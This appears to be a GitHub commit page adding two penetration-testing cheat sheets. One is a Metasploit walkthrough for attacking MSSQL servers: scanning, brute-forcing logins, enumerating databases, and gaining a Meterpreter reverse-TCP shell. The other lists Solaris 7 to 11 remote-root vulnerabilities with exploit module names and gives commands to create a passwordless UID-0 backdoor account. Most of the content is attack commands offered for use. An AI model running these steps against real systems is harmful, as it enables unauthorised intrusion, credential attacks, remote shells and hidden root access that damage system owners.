forked from dipsec/Cheatsheets-1
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Added AttackingMSSQL and Solaris Cheatsheets
Added AttackingMSSQL and Solaris Cheatsheets
- Loading branch information
Showing
2 changed files
with
59 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,21 @@ | ||
| [+] Attacking MSSQL with Metasploit | ||
|
|
||
| [>] Enumerate MSSQL Servers on the network: | ||
|
|
||
| msf > use auxiliary/scanner/mssql/mssql_ping | ||
| nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156 | ||
| Discover more servers using "Browse for More" via Microsoft SQL Server Management Studio. | ||
|
|
||
| [>] Bruteforce MSSQL Database: | ||
|
|
||
| msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login | ||
|
|
||
| [>] Enumerate MSSQL Database: | ||
|
|
||
| msf > use auxiliary/admin/mssql/mssql_enum | ||
|
|
||
| [>] Gain shell using gathered credentials | ||
|
|
||
| msf > use exploit/windows/mssql/mssql_payload | ||
| msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp | ||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,38 @@ | ||
| [+] Solaris vulnerabilities: | ||
|
|
||
| Solaris 7: | ||
| sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl | ||
| **ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client | ||
| sendmail_exec LPD - line printer daemon buffer overflow - allows root | ||
| heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root | ||
| ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root | ||
| kcms_readfile kcms / ttdbserverd remote file read (only in msf2) | ||
|
|
||
| Solaris 8: | ||
| sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl | ||
| **ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client | ||
| sendmail_exec LPD - line printer daemon buffer overflow - allows root | ||
| heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root | ||
| ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. | ||
| no exploit - sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function. | ||
| kcms_readfile kcms / ttdbserverd remote file read (only in msf2) | ||
|
|
||
| solaris 9: | ||
| sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl | ||
| ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. | ||
| sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function. | ||
| kcms_readfile kcms / ttdbserverd remote file read (only in msf2) | ||
|
|
||
| Solaris 10: | ||
| fuser TELNET - authentication bypass through -f command - can be manually exploited | ||
| ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. | ||
|
|
||
| Solaris 11: | ||
| fuser TELNET - authentication bypass through -f command - can be manually exploited | ||
|
|
||
| [+] Adding solaris user: | ||
|
|
||
| useradd -u 0 -o pentestuser | ||
| passwd -d pentestuser | ||
|
|
||
| [+] In addition, familiarise yourself with rpcinfo, nfsshell, showmount, 'mount -t nfs'. |